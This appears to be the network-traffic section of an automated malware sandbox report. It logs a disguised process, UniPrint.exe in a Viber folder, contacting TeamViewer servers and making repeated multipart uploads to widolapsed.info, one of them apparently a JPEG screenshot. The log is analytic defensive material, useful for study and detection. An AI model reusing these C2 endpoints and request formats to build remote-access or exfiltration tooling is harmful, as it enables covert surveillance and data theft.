Cache-Control: no-cache
Sep 15, 2021 13:45:21.277640104 CEST | 1055 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 9
Data Raw: 17 24 13 04 00 98 20 27 a5
Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.3 | 49748 | 185.188.32.22 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:45:21.307344913 CEST | 1055 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.328543901 CEST | 1056 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 34 30 30 38 32 38 36 34
Data Ascii: $40082864
Sep 15, 2021 13:45:21.333331108 CEST | 1056 | OUT | GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.354281902 CEST | 1056 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 13:45:21.356128931 CEST | 1057 | OUT | GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.381381035 CEST | 1057 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 9
Data Raw: 17 24 13 04 00 98 20 27 a5
Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.3 | 49749 | 185.188.32.22 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:45:21.420521975 CEST | 1058 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.441457987 CEST | 1058 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 34 30 30 38 32 38 37 33
Data Ascii: $40082873
Sep 15, 2021 13:45:21.443578959 CEST | 1059 | OUT | GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.465447903 CEST | 1059 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 13:45:21.467319965 CEST | 1059 | OUT | GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.488471985 CEST | 1060 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 430


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.3 | 49750 | 188.172.198.151 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:45:21.541134119 CEST | 1060 | OUT | GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 188.172.198.151
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.574105978 CEST | 1060 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 17
Data Raw: 17 24 66 61 73 74 31 32 34 31 38 33 33 39
Data Ascii: $fast12418339
Sep 15, 2021 13:45:21.865210056 CEST | 1062 | OUT | POST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 188.172.198.151
Content-Length: 500000
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 192.168.2.3 | 49751 | 188.172.198.151 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:45:21.703310013 CEST | 1061 | OUT | POST /dout.aspx?s=12418339&p=10000001&client=DynGate HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 188.172.198.151
Content-Length: 3
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.823175907 CEST | 1062 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 13:45:21.865972042 CEST | 1063 | OUT | GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 188.172.198.151
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.899944067 CEST | 1063 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 500000
Data Raw: 17 24 11 04 00 5f a6 01 2f
Data Ascii: $_/


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49757 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49758 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49760 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49761 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49762 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data


HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49752 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:23 UTC | 0 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76431
Content-Type: multipart/form-data; boundary=--------3259937207
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:23 UTC74INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:23 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=de80600dc92f141ee3da10fe6bf05f4a0734f2904d555e3f118b82595cba32d2; expires=Thu, 15-Sep-2022 11:45:23 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49753 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:25 UTC | 75 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76426
Content-Type: multipart/form-data; boundary=--------974736809
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:25 UTC | 75 | OUT | Data Ascii:
----------974736809
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:45:25 UTC | 150 | OUT | Data Ascii: ----------974736809--
2021-09-15 11:45:26 UTC | 150 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:25 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=bded72cc5c7f2e575f605fb39a97e546a831d014bb37e8828c9704ca34d93734; expires=Thu, 15-Sep-2022 11:45:25 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49763 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:35 UTC | 797 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 81307
Content-Type: multipart/form-data; boundary=--------2963325791
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:35 UTC | 797 | OUT | Data Ascii:
----------2963325791
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:45:35 UTC | 876 | OUT | Data Ascii: ----------2963325791--
2021-09-15 11:45:36 UTC | 876 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:35 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=0177b2f0d50c47965112384af772a4e79e63ae85d66bbd6fd460747d9ae09620; expires=Thu, 15-Sep-2022 11:45:36 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49764 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:37 UTC | 877 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 85135
Content-Type: multipart/form-data; boundary=--------2571491142
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:37 UTC | 877 | OUT | Data Ascii:
----------2571491142
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:45:37 UTC | 960 | OUT | Data Ascii: ----------2571491142--
2021-09-15 11:45:37 UTC | 960 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:37 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=ef4cd9e59b43a1592fdd724fc97f6d09dc93332053352ed0f8b5cf10b037f7de; expires=Thu, 15-Sep-2022 11:45:37 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.34976545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                      2021-09-15 11:45:38 UTC | 960 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 82926
                                                                                                      Content-Type: multipart/form-data; boundary=--------3335732562
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:38 UTC | 961 | OUT | Data Ascii:
                                                                                                      ----------3335732562
                                                                                                      Content-Disposition: form-data; name="k"
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:40 UTC | 1042 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:38 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=54f790c46c8dc0819b9f3be8ec19ea40856b9f1ee1cf970e5b4241b5eb21ec1e; expires=Thu, 15-Sep-2022 11:45:38 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.34977145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                      2021-09-15 11:45:41 UTC | 1042 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 83052
                                                                                                      Content-Type: multipart/form-data; boundary=--------1291895716
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:41 UTC | 1042 | OUT | Data Ascii:
                                                                                                      ----------1291895716
                                                                                                      Content-Disposition: form-data; name="k"
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:42 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:41 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=74da0ed575cf66f14583ff16cd489bc68a83938351dc5ccad80348da77c67836; expires=Thu, 15-Sep-2022 11:45:41 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.34977845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                      2021-09-15 11:45:42 UTC | 1124 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76682
                                                                                                      Content-Type: multipart/form-data; boundary=--------1315708494
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:42 UTC | 1124 | OUT | Data Ascii:
                                                                                                      ----------1315708494
                                                                                                      Content-Disposition: form-data; name="k"
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:42 UTC1124OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b6 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:42 UTC1124OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:42 UTC1140OUTData Raw: 33 f3 a7 d0 f6 fe 62 b9 dd 67 fe 3d 13 fe ba 0f e4 6b b2 a4 94 a9 39 2e a8 e3 a7 17 1a ca 2f a3 31 68 a2 8a f3 0f 54 28 a2 92 80 3d ea 58 03 fc c9 c3 7f 3a 80 64 1c 1e a2 ae 1a a6 c7 f7 af fe f1 af 97 a8 96 e7 af 16 48 a6 bc 63 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e cc a6 bc 67 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e 86 59 f1 48 e5 c5 ec 8a 14 b4 94 b5 ec 9c 41 46 28 a2 81 06 2b d3 fe 14 f1 a4 df 7f d7 71 ff 00 a0 d7 98 57 a7 7c 2a ff 00 90 4d f7 fd 77 1f fa 0d 67 57 e1 34 a7 f1 1d d5 25 64 d8 da c0 fa 4d b5 cd cc f7 59 68 16 49 1c dd ca 07 dd 04 9f bd 56 52 c2 d6 48 d5 e3 9a e9 95 86 41 17 92 e0 8f fb ea b1 71 8a 7b fe 1f f0 4d 14 a4 d6 df 8f fc 02 a6 a9 05 ad da 5d 5a 5e c1 24 91 ca c0 f1 13 37 f0 a8 c8 20 75 e2 bc 87 5f d2 ff 00 b2 35 47 b5 0e 5d
                                                                                                      Data Ascii: 3bg=k9./1hT(=X:dHc^R3^g^R3^YHAF(+qW|*MwgW4%dMYhIVRHAq{M]Z^$7 u_5G]
                                                                                                      2021-09-15 11:45:42 UTC1156OUTData Raw: 80 a0 0a 75 04 b6 14 94 b8 a3 14 c4 14 b4 94 b4 08 29 cb 4d a5 a0 07 d1 4d a7 0a 64 8b 45 25 2d 02 2c e9 df f1 fd 17 d6 9f 7a 7f d3 65 ff 00 7a 99 a7 7f c7 f4 5f 5a 5b b3 9b a9 3f de ac 3f e5 e9 6f f8 64 54 94 51 5a 98 8b 45 25 2d 00 14 51 45 02 16 8a 4a 5a 40 14 51 45 02 0a 5a 4a 5a 40 14 b4 94 a2 81 0a 29 69 29 69 08 5a b1 03 74 15 5a a6 b7 fb d5 12 d8 d2 93 b4 8d 7d 58 e3 c3 43 dd ab 89 7e b5 d9 eb 3c 78 69 3f de ae 2d cf 35 8e 17 e0 7e a7 a9 5f e3 5e 87 7a 38 f0 ed 97 d0 55 1c d5 d6 e3 c3 f6 23 fd 91 fc aa 8d 73 d1 eb ea 69 88 7e f2 f4 17 34 66 92 92 b6 39 ee 3b 34 a1 a9 a2 8a 2c 09 8f c9 a7 6e 3e b4 c1 4b 52 d1 69 b2 40 c6 9c 18 d4 42 9d 9a 96 8a 52 64 a1 cf ad 38 4c c3 a3 1a 84 1a 5a 97 14 5a 9b 2d 2d cc 83 f8 8d 4a b7 8e 3a e0 d5 20 69 d9 a8 74 e2
                                                                                                      Data Ascii: u)MMdE%-,zez_Z[??odTQZE%-QEJZ@QEZJZ@)i)iZtZ}XC~<xi?-5~_^z8U#si~4f9;4,n>KRi@BRd8LZZ--J: it
2021-09-15 11:45:42 UTC | 1199 | OUT | Data Ascii: ----------1315708494--
2021-09-15 11:45:45 UTC | 1199 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:42 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=b43afc0eb707f8b68fa0a36d475eea243f65ba7380961676812b4c94a71a640c; expires=Thu, 15-Sep-2022 11:45:43 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8
2021-09-15 11:45:45 UTC | 1199 | IN | Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
Data Ascii: y80aRR64VR1K\!~v]


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49789 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:47 UTC | 1199 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76660
Content-Type: multipart/form-data; boundary=--------3047557173
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:47 UTC | 1200 | OUT | Data Ascii:
----------3047557173
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:45:47 UTC | 1274 | OUT | Data Ascii: ----------3047557173--
2021-09-15 11:45:58 UTC | 1274 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:47 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=8c27c54f2fd76dc0ad9226e04f257e8207cb76898200853e1b0060be8d5aa986; expires=Thu, 15-Sep-2022 11:45:47 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8
2021-09-15 11:45:58 UTC | 1275 | IN | Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
Data Ascii: y80aRR64VR1K\!~v]


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49803 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:00 UTC | 1275 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76627
Content-Type: multipart/form-data; boundary=--------3142017803
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:00 UTC | 1275 | OUT | Data Ascii:
----------3142017803
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:00 UTC | 1350 | OUT | Data Ascii: ----------3142017803--
2021-09-15 11:46:13 UTC | 1350 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:00 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=cf7acf491945062ccba84d5e56673d456edfffe67f71e94ae1b80e303c8e026e; expires=Thu, 15-Sep-2022 11:46:01 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8
2021-09-15 11:46:13 UTC | 1350 | IN | Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
Data Ascii: y80aRR64VR1K\!~v]


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49804 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:14 UTC | 1350 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76637
Content-Type: multipart/form-data; boundary=--------2197444700
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:14 UTC | 1351 | OUT | Data Ascii:
----------2197444700
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:14 UTC1425OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 39 37 34 34 34 37 30 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2197444700--
2021-09-15 11:46:15 UTC | 1425 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:14 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=767c8afad45cf6433af0e5e24d8c8a3c2ef6dbdfed1900b5f91c2f28482e82da; expires=Thu, 15-Sep-2022 11:46:14 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.3 | 49805 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:15 UTC | 1426 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76633
Content-Type: multipart/form-data; boundary=--------327613734
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:15 UTC | 1426 | OUT | Data Ascii:
----------327613734
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:16 UTC | 1501 | IN | HTTP/1.1 200 OK
